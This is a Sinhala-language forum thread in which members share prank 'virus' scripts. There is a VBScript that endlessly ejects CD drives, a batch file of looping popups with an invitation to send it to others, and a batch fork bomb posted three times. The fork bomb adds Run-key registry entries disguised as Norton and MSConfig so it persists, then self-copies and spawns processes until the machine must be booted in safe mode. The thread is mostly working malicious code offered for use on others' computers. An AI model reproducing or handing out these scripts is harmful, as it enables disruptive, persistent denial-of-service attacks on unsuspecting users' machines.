Fun Virus එකක්..(නොනවත්තා ROM එක Eject / Close වෙයි )

choppe

Well-known member
  • Nov 20, 2007
    8,235
    3,435
    113
    Fun Virus එකක්..(නොනවත්තා ROM එක Eject / Close වෙයි )

    මේකයි කරන්න ඕනි ...මේ script එක notepad එකක copy කර ගන්න...

    Set oWMP = CreateObject("WMPlayer.OCX.7" )
    Set colCDROMs = oWMP.cdromCollection
    if colCDROMs.Count >= 1 then
    do
    For i = 0 to colCDROMs.Count - 1
    colCDROMs.Item(i).Eject
    Next ' cdrom
    For i = 0 to colCDROMs.Count - 1
    colCDROMs.Item(i).Eject
    Next ' cdrom
    loop
    End If


    ඊට පස්සේ File - Save Ass...ගිහින්
    එක rename කරගන්න
    .vbs format එකට


    EX: Virus.vbs

    එට පස්සේ save කර ගන්න



    දැන් ඒ file එක double click කරලා බලන්න.:D


    දැන් ඉතින් එක නතර කර ගන්නත් ඕනෙනේ..:oo:
    එතකොට කරන්න තියෙන්නේ Task Manager ගිහින් එකේ run වෙන wscript.exe එක end process කරන්න ...:D


    වැඩ කලොත් රේප් එකකුත් දෙන්න..
    :rolleyes:






     

    galleline

    Well-known member
  • Feb 8, 2009
    6,088
    179
    63
    ********
    @ECHO off :Begin msg * Hi msg * Are you having fun? msg * I am! msg * Lets have fun together! msg * Because you have been o-w-n-e-d GOTO BEGIN

    Save it as "Anything.BAT" and send it.
     

    galleline

    Well-known member
  • Feb 8, 2009
    6,088
    179
    63
    ********
    Here's another simple batch file virus
    It creates a reg file and puts it in the registry
    then it creates a file in C:\ called 2.bat
    the 2.bat file copys itself into other files and opens them
    each file does the same 2.bat but they EACH loop
    so it keeps on opening other batches that each loop and open other batches
    the only way out is to boot in safe mode.
    I tried this one a couple comps and on one of them it wasnt very effective and it only opened a limited amount of files and im not sure why because i was able to crt+alt+del which i wasnt able to do on the other comps which were all winblows xp. there will be 1600 processes opening about 1600 other processes opening up another 1600 processes and so on looping on each of them

    @echo off
    del C:\1.reg
    >>"C:\1.reg" ECHO winblows Registry Editor Version 5.00
    >>"C:\1.reg" ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\winblows\CurrentVersion\Run]
    >>"C:\1.reg" ECHO "MSConfig"="C:\\1.bat "
    >>"C:\1.reg" ECHO "MCUpdateExe"="c:\\2.bat"
    >>"C:\1.reg" ECHO "explorer"="c:\\3.bat"
    >>"C:\1.reg" ECHO "Norton"="c:\\winblows\\1.bat"
    >>"C:\1.reg" ECHO "System"="c:\\winblows\\2.bat"
    >>"C:\1.reg" ECHO "autoexec"="c:\\winblows\\3.bat"
    regedit.exe /s C:\1.reg

    >>"C:\2.bat" ECHO :1
    >>"C:\2.bat" ECHO copy 2.bat C:\3.bat
    >>"C:\2.bat" ECHO copy 2.bat C:\4.bat
    >>"C:\2.bat" ECHO copy 2.bat C:\5.bat
    >>"C:\2.bat" ECHO start C:\2.bat
    >>"C:\2.bat" ECHO start C:\3.bat
    >>"C:\2.bat" ECHO start C:\4.bat
    >>"C:\2.bat" ECHO start C:\5.bat
    >>"C:\2.bat" ECHO copy C:\2.bat C:\winblows\1.bat
    >>"C:\2.bat" ECHO copy C:\3.bat C:\winblows\2.bat
    >>"C:\2.bat" ECHO copy C:\4.bat C:\winblows\3.bat
    >>"C:\2.bat" ECHO start C:\winblows\1.bat
    >>"C:\2.bat" ECHO start C:\winblows\2.bat
    >>"C:\2.bat" ECHO start C:\winblows\3.bat
    >>"C:\2.bat" ECHO goto 1

    start 2.bat
    del C:\1.reg
     
    Here's another simple batch file virus
    It creates a reg file and puts it in the registry
    then it creates a file in C:\ called 2.bat
    the 2.bat file copys itself into other files and opens them
    each file does the same 2.bat but they EACH loop
    so it keeps on opening other batches that each loop and open other batches
    the only way out is to boot in safe mode.
    I tried this one a couple comps and on one of them it wasnt very effective and it only opened a limited amount of files and im not sure why because i was able to crt+alt+del which i wasnt able to do on the other comps which were all winblows xp. there will be 1600 processes opening about 1600 other processes opening up another 1600 processes and so on looping on each of them

    @echo off
    del C:\1.reg
    >>"C:\1.reg" ECHO winblows Registry Editor Version 5.00
    >>"C:\1.reg" ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\winblows\CurrentVersion\Run]
    >>"C:\1.reg" ECHO "MSConfig"="C:\\1.bat "
    >>"C:\1.reg" ECHO "MCUpdateExe"="c:\\2.bat"
    >>"C:\1.reg" ECHO "explorer"="c:\\3.bat"
    >>"C:\1.reg" ECHO "Norton"="c:\\winblows\\1.bat"
    >>"C:\1.reg" ECHO "System"="c:\\winblows\\2.bat"
    >>"C:\1.reg" ECHO "autoexec"="c:\\winblows\\3.bat"
    regedit.exe /s C:\1.reg

    >>"C:\2.bat" ECHO :1
    >>"C:\2.bat" ECHO copy 2.bat C:\3.bat
    >>"C:\2.bat" ECHO copy 2.bat C:\4.bat
    >>"C:\2.bat" ECHO copy 2.bat C:\5.bat
    >>"C:\2.bat" ECHO start C:\2.bat
    >>"C:\2.bat" ECHO start C:\3.bat
    >>"C:\2.bat" ECHO start C:\4.bat
    >>"C:\2.bat" ECHO start C:\5.bat
    >>"C:\2.bat" ECHO copy C:\2.bat C:\winblows\1.bat
    >>"C:\2.bat" ECHO copy C:\3.bat C:\winblows\2.bat
    >>"C:\2.bat" ECHO copy C:\4.bat C:\winblows\3.bat
    >>"C:\2.bat" ECHO start C:\winblows\1.bat
    >>"C:\2.bat" ECHO start C:\winblows\2.bat
    >>"C:\2.bat" ECHO start C:\winblows\3.bat
    >>"C:\2.bat" ECHO goto 1

    start 2.bat
    del C:\1.reg

    :no:ane matcho terena sinhaleni keyanina kooo mata terune na ne:no:
     

    choppe

    Well-known member
  • Nov 20, 2007
    8,235
    3,435
    113
    badu weda ... :lol:
    11.gif
     

    choppe

    Well-known member
  • Nov 20, 2007
    8,235
    3,435
    113
    Here's another simple batch file virus
    It creates a reg file and puts it in the registry
    then it creates a file in C:\ called 2.bat
    the 2.bat file copys itself into other files and opens them
    each file does the same 2.bat but they EACH loop
    so it keeps on opening other batches that each loop and open other batches
    the only way out is to boot in safe mode.
    I tried this one a couple comps and on one of them it wasnt very effective and it only opened a limited amount of files and im not sure why because i was able to crt+alt+del which i wasnt able to do on the other comps which were all winblows xp. there will be 1600 processes opening about 1600 other processes opening up another 1600 processes and so on looping on each of them

    @echo off
    del C:\1.reg
    >>"C:\1.reg" ECHO winblows Registry Editor Version 5.00
    >>"C:\1.reg" ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\winblows\CurrentVersion\Run]
    >>"C:\1.reg" ECHO "MSConfig"="C:\\1.bat "
    >>"C:\1.reg" ECHO "MCUpdateExe"="c:\\2.bat"
    >>"C:\1.reg" ECHO "explorer"="c:\\3.bat"
    >>"C:\1.reg" ECHO "Norton"="c:\\winblows\\1.bat"
    >>"C:\1.reg" ECHO "System"="c:\\winblows\\2.bat"
    >>"C:\1.reg" ECHO "autoexec"="c:\\winblows\\3.bat"
    regedit.exe /s C:\1.reg

    >>"C:\2.bat" ECHO :1
    >>"C:\2.bat" ECHO copy 2.bat C:\3.bat
    >>"C:\2.bat" ECHO copy 2.bat C:\4.bat
    >>"C:\2.bat" ECHO copy 2.bat C:\5.bat
    >>"C:\2.bat" ECHO start C:\2.bat
    >>"C:\2.bat" ECHO start C:\3.bat
    >>"C:\2.bat" ECHO start C:\4.bat
    >>"C:\2.bat" ECHO start C:\5.bat
    >>"C:\2.bat" ECHO copy C:\2.bat C:\winblows\1.bat
    >>"C:\2.bat" ECHO copy C:\3.bat C:\winblows\2.bat
    >>"C:\2.bat" ECHO copy C:\4.bat C:\winblows\3.bat
    >>"C:\2.bat" ECHO start C:\winblows\1.bat
    >>"C:\2.bat" ECHO start C:\winblows\2.bat
    >>"C:\2.bat" ECHO start C:\winblows\3.bat
    >>"C:\2.bat" ECHO goto 1

    start 2.bat
    del C:\1.reg


    :oo: